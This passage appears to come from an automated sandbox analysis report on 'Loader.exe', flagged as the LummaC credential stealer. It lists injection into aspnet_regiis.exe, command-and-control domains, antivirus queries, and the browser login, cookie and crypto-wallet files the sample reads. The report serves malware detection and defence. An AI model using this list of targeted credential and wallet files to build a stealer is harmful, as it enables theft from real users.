Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31F0000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: offybirhtdi.sbs
Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: activedomest.sbs
Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: arenbootk.sbs
Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: mediavelk.sbs
Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: definitib.sbs
Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: elaboretib.sbs
Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: strikebripm.sbs
Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: ostracizez.sbs
Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: withdrwblon.cyou

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31F0000	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31F1000	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3236000	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3239000	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3249000	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F42008	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Code function: 5_2_6D7DEB73 cpuid

5_2_6D7DEB73

Source: C:\Users\user\Desktop\Loader.exe	Queries volume information: C:\Users\user\Desktop\Loader.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Code function: 5_2_6D7DEF1A GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_6D7DEF1A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: aspnet_regiis.exe, 00000008.00000003.1411278198.0000000005955000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1393845431.0000000005955000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1393675845.0000000005955000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1425355733.0000000005956000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7388, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: aspnet_regiis.exe	String found in binary or memory: ets/Electrum-LTC
Source: aspnet_regiis.exe, 00000008.00000003.1329981970.0000000003653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: aspnet_regiis.exe, 00000008.00000003.1423102544.000000000361E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: aspnet_regiis.exe, 00000008.00000003.1329981970.0000000003653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: aspnet_regiis.exe, 00000008.00000003.1329981970.0000000003653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: aspnet_regiis.exe, 00000008.00000003.1351112445.00000000036AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3l
Source: aspnet_regiis.exe, 00000008.00000003.1329981970.000000000363C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance_
Source: aspnet_regiis.exe, 00000008.00000003.1329981970.0000000003653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: aspnet_regiis.exe, 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: aspnet_regiis.exe, 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
